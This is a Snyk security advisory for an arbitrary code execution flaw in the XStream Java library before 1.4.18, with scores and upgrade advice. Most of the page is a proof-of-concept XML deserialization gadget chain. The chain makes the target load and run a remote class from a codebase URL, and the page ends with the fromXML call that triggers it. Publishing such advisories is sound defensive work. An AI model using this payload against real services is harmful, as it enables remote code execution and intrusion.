Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)


0.0
high
0
10

Snyk CVSS

    Attack Complexity High
    Scope Changed
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 2.46% (91st percentile)
Expand this section
NVD
8.5 high
Expand this section
SUSE
8.1 high
Expand this section
Red Hat
8.5 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179
  • published 24 Aug 2021
  • disclosed 24 Aug 2021
  • credit Smi1e

How to fix?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<javax.swing.event.EventListenerList serialization='custom'>
  <javax.swing.event.EventListenerList>
    <default>
      <listenerList>
        <javax.swing.undo.UndoManager>
          <hasBeenDone>true</hasBeenDone>
          <alive>true</alive>
          <inProgress>true</inProgress>
          <edits>
            <com.sun.xml.internal.ws.api.message.Packet>
              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                <parsedMessage>true</parsedMessage>
                <soapVersion>SOAP_11</soapVersion>
                <bodyParts/>
                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                  <attachmentsInitialized>false</attachmentsInitialized>
                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
                    <soapPart/>
                    <mm>
                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                          <cleaned>false</cleaned>
                          <entries>
                            <com.sun.jndi.ldap.LdapEntry>
                              <DN>cn=four,cn=three,cn=two,cn=one</DN>
                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                                <javax.naming.directory.BasicAttribute>
                                  <default>
                                    <ignoreCase>false</ignoreCase>
                                  </default>
                                  <int>4</int>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>objectClass</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>javanamingreference</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default>
                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
                                          <com.sun.jndi.ldap.LdapName>
                                            <string>cn=four,cn=three,cn=two,cn=one</string>
                                            <boolean>false</boolean>
                                          </com.sun.jndi.ldap.LdapName>
                                        </rdn>
                                      </default>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaCodeBase</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>http://127.0.0.1:8080/</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaClassName</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>refObj</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaFactory</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>ExecTemplateJDK7</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                </javax.naming.directory.BasicAttribute>
                              </attributes>
                            </com.sun.jndi.ldap.LdapEntry>
                          </entries>
                          <limit>2</limit>
                          <posn>0</posn>
                          <homeCtx/>
                          <more>true</more>
                          <hasMoreCalled>true</hasMoreCalled>
                        </aliases>
                      </it>
                    </mm>
                  </multiPart>
                </sm>
              </message>
            </com.sun.xml.internal.ws.api.message.Packet>
          </edits>
          <indexOfNextAdd>0</indexOfNextAdd>
          <limit>100</limit>
        </javax.swing.undo.UndoManager>
      </listenerList>
    </default>
    <string>java.lang.InternalError</string>
    <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
    <null/>
  </javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>
XStream xstream = new XStream();
xstream.fromXML(xml);